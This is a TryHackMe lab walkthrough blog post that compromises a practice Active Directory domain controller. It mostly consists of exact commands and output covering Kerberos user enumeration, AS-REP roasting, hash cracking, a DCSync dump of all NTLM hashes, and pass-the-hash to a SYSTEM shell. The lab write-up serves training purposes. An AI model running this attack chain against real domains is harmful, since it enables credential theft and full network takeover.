Attacktive Directory – TryHackMe Walkthrough

Boris TougmaBoris Tougma
7 min read

Table of contents

Introduction: Unveiling the Attacktive Directory Lab

The Attacktive Directory room is a hands-on Active Directory exploitation lab that illustrates how weak Kerberos configurations and overprivileged accounts can lead to a complete domain compromise. This write-up details the precise steps I followed, from initial reconnaissance to obtaining a SYSTEM shell on the domain controller.

Enumeration: Scanning the Network for Vulnerabilities

I began with a full TCP scan using Nmap:

nmap -A -p- 10.10.142.138
Starting Nmap 7.80 ( https://nmap.org ) at 2025-04-29 09:33 BST
Nmap scan report for 10.10.142.138
Host is up (0.0063s latency).
Not shown: 65508 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-29 08:33:54Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2025-04-29T08:36:20+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2025-04-28T07:58:20
|_Not valid after:  2025-10-28T07:58:20
|_ssl-date: 2025-04-29T08:36:35+00:00; 0s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49673/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49685/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49832/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=4/29%Time=68108EF7%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
MAC Address: 02:8F:FD:64:70:D9 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/29%OT=53%CT=1%CU=44114%PV=Y%DS=1%DC=D%G=Y%M=028FFD%T
OS:M=68108F95%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=108%TI=I%CI=I%II=I
OS:%SS=S%TS=U)OPS(O1=M2301NW8NNS%O2=M2301NW8NNS%O3=M2301NW8%O4=M2301NW8NNS%
OS:O5=M2301NW8NNS%O6=M2301NNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W
OS:6=FF70)ECN(R=Y%DF=Y%T=80%W=FFFF%O=M2301NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y
OS:%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%
OS:O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=8
OS:0%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%
OS:Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=
OS:Y%DFI=N%T=80%CD=Z)

Network Distance: 1 hop
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: ATTACKTIVEDIREC, NetBIOS user: <unknown>, NetBIOS MAC: 02:8f:fd:64:70:d9 (unknown)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-04-29T08:36:20
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   6.30 ms 10.10.142.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 213.23 seconds

The results revealed:

  • IIS 10.0 web server (default page only)

  • Kerberos (88/tcp), LDAP (389, 3268/tcp), SMB (445/tcp)

  • RDP (3389/tcp)

  • SMB signing enabled

  • Domain: spookysec.local, Hostname: ATTACKTIVEDIREC

With the web server offering nothing useful, I focused on SMB. Using enum4linux, I confirmed the domain SID, saw that null SMB sessions were allowed, and identified some standard accounts, but no accessible shares.

Kerberos User Enumeration: Identifying High-Value Targets

Since SMB wasn’t giving me much, I turned to Kerberos enumeration with kerbrute:

💡
For this lab, we use customs usernames and password lists.
./kerbrute_linux_amd64 userenum --dc 10.10.142.138 -d spookysec.local userlist.txt 

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/29/25 - Ronnie Flathers @ropnop

2025/04/29 11:14:09 >  Using KDC(s):
2025/04/29 11:14:09 >      10.10.142.138:88

2025/04/29 11:14:09 >  [+] VALID USERNAME:     james@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     svc-admin@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     James@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     robin@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     darkstar@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     administrator@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     backup@spookysec.local
2025/04/29 11:14:09 >  [+] VALID USERNAME:     paradox@spookysec.local
2025/04/29 11:14:10 >  [+] VALID USERNAME:     JAMES@spookysec.local
2025/04/29 11:14:10 >  [+] VALID USERNAME:     Robin@spookysec.local
2025/04/29 11:14:12 >  [+] VALID USERNAME:     Administrator@spookysec.local
2025/04/29 11:14:15 >  [+] VALID USERNAME:     Darkstar@spookysec.local
2025/04/29 11:14:15 >  [+] VALID USERNAME:     Paradox@spookysec.local
2025/04/29 11:14:18 >  [+] VALID USERNAME:     DARKSTAR@spookysec.local
2025/04/29 11:14:19 >  [+] VALID USERNAME:     ori@spookysec.local
2025/04/29 11:14:21 >  [+] VALID USERNAME:     ROBIN@spookysec.local
2025/04/29 11:14:25 >  Done! Tested 73317 usernames (16 valid) in 16.214 seconds

This identified several valid accounts, including:

svc-admin@spookysec.local
backup@spookysec.local
administrator@spookysec.local

svc-admin and backup stood out as high-value targets.

AS-REP Roasting: Exploiting Vulnerable Accounts

I checked for accounts without Kerberos pre-authentication using Impacket’s GetNPUsers.py on the valid users found by kerbrute :

GetNPUsers.py spookysec.local/ -usersfile valid_users.txt -no-pass -dc-ip 10.10.142.138
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[-] User james@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@spookysec.local@SPOOKYSEC.LOCAL:16457ba39787d68d1aa4cc734c7b48a0$ff55908cfaee397a6d64793a2d185356ecaab4379ab73e9649844d807c59adf23bb5e5946f6cb9cd410fdc370ec843c289e0d6362b89b166ce1c1294b66f54dd8c252db95e6fca0fa8cbc072ead48d424879830f0ce5d7c626ffa71ae67217c7cc799a2bd00c70c5e016dde6c996a1cc6e7db7f619690a19f0e1cfba4a9cbf712493e28f47c1dc86e3b005780393ec090079ce1423f021d0826db13f23f837da1a48d10f8c3d6dd07d5428cf27af3bba6da665fca1ab1104b771fd8255999fac779321aea40f6e5c4a8034f841f3a48d7a841c467a46363813c7b06db37fe851ca896d408d20c9ad7cd51769ad4fa2d1ee2c
[-] User James@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JAMES@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Robin@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darkstar@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Paradox@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DARKSTAR@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ori@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ROBIN@spookysec.local doesn't have UF_DONT_REQUIRE_PREAUTH set

Only svc-admin was vulnerable. I obtained the AS-REP hash and cracked it with hashcat:

hashcat -m 18200 hash.txt passwordlist.txt --show

Credentials found:

svc-admin : management2005

SMB Access & Backup Credentials: Uncovering Hidden Secrets

Using these credentials, I accessed SMB shares:

smbclient -L //spookysec.local -I 10.10.142.138 -U svc-admin
Password for [WORKGROUP\svc-admin]:

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    backup          Disk      
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

I found a backup share containing backup_credentials.txt.

smbclient //10.10.142.138/backup -U svc-admin
Password for [WORKGROUP\svc-admin]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Apr  4 20:08:39 2020
  ..                                  D        0  Sat Apr  4 20:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 20:08:53 2020

        8247551 blocks of size 4096. 4035435 blocks available
smb: \> get backup_credentials.txt 
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)

I downloaded it, and it seems like a hashed credential.

cat backup_credentials.txt 
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decoding its Base64 content revealed (you can use Cyberchef or a CLI tool):

backup@spookysec.local:backup2517860

DCSync & Hash Dumping: Extracting Domain Passwords

The backup account had DCSync privileges, allowing me to dump all domain password hashes via secretsdump.py:

secretsdump.py -just-dc-ntlm spookysec.local/backup:backup2517860@10.10.142.138
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:b1511daf1f607e214432ec431f54345f:::
[*] Cleaning up...

From the output, I retrieved the Domain Administrator’s NTLM hash:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::

Pass-the-Hash to Domain Admin: Achieving Full Domain Control

With the hash in hand, I used a Pass-the-Hash attack:

psexec.py spookysec.local/Administrator@10.10.142.138 -hashes :0e0363213e37b94221497260b0bcb4fc
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Requesting shares on 10.10.142.138.....
[*] Found writable share ADMIN$
[*] Uploading file BiNSwzVf.exe
[*] Opening SVCManager on 10.10.142.138.....
[*] Creating service VdCn on 10.10.142.138.....
[*] Starting service VdCn.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1490]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> cd c:\users

c:\Users> dir
 Volume in drive C has no label.
 Volume Serial Number is EEA6-70E8

 Directory of c:\Users

09/17/2020  04:03 PM    <DIR>          .
09/17/2020  04:03 PM    <DIR>          ..
09/17/2020  04:04 PM    <DIR>          a-spooks
09/17/2020  04:02 PM    <DIR>          Administrator
04/04/2020  12:19 PM    <DIR>          backup
04/04/2020  01:07 PM    <DIR>          backup.THM-AD
04/04/2020  11:19 AM    <DIR>          Public
04/04/2020  12:18 PM    <DIR>          svc-admin
               0 File(s)              0 bytes
               8 Dir(s)  16,525,987,840 bytes free
c:\Users> type backup\Desktop\PrivEsc.txt
TryHackMe{********}

This gave me a SYSTEM shell on the domain controller, from which I retrieved the final flag.

Conclusion: Lessons Learned and Defensive Strategies

This attack chain moved from Kerberos enumeration to AS-REP Roasting, credential harvesting, DCSync abuse, and finally Pass-the-Hash to full domain compromise.
The lab highlights how a single misconfigured account can escalate into total control of an Active Directory environment.

Defensive measures include:

  • Enforcing Kerberos pre-authentication

  • Limiting DCSync rights

  • Monitoring unusual Kerberos and replication activity

0
Subscribe to my newsletter

Read articles from Boris Tougma directly inside your inbox. Subscribe to the newsletter, and don't miss out.

tryhackmepentesting#cybersecurityTryHackMe WalkthroughActive Directory

Written by

Boris Tougma
Boris Tougma

I'm a cybersecurity student who loves high-tech, but also music, cinema and Japanese culture.